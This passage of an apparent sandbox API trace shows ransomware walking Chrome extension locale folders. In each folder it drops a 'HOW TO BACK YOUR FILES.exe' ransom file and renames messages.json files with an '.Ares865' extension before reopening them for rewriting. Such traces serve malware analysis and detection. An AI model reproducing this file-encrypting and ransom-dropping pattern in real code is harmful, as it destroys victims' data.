(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.276] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=209) returned 1 [0102.279] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no" [0102.280] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no" [0102.280] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.280] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.280] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.281] GetLastError () returned 0x0 [0102.281] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841b5a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9c4300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9c4300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.281] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.281] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.281] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.281] lstrlenW (lpString="messages.json") returned 13 [0102.281] lstrlenW (lpString="Ares865") returned 7 [0102.281] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.281] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.Ares865") returned 160 [0102.281] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.283] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=191) returned 1 [0102.295] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl" [0102.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl" [0102.295] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.295] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.295] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.296] GetLastError () returned 0x0 [0102.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841ae4e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9ea460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9ea460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.296] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.296] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.296] lstrlenW (lpString="messages.json") returned 13 [0102.296] lstrlenW (lpString="Ares865") returned 7 [0102.296] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.296] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.Ares865") returned 160 [0102.297] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0102.307] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms" [0102.307] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms" [0102.307] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.308] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.308] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.308] GetLastError () returned 0x0 [0102.309] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.309] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841a6fb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9ea460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9ea460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.309] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.309] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.309] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.309] lstrlenW (lpString="messages.json") returned 13 [0102.309] lstrlenW (lpString="Ares865") returned 7 [0102.309] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.Ares865") returned 160 [0102.309] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=208) returned 1 [0102.314] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv" [0102.314] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv" [0102.314] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.314] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.315] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.315] GetLastError () returned 0x0 [0102.315] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8419fa80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9ea460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9ea460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.315] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.315] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.315] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.316] lstrlenW (lpString="messages.json") returned 13 [0102.316] lstrlenW (lpString="Ares865") returned 7 [0102.316] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.316] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.Ares865") returned 160 [0102.316] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=229) returned 1 [0102.320] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt" [0102.321] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt" [0102.321] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.321] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.321] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.322] GetLastError () returned 0x0 [0102.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84195e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9ea460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9ea460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.322] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.322] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.322] lstrlenW (lpString="messages.json") returned 13 [0102.322] lstrlenW (lpString="Ares865") returned 7 [0102.322] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: 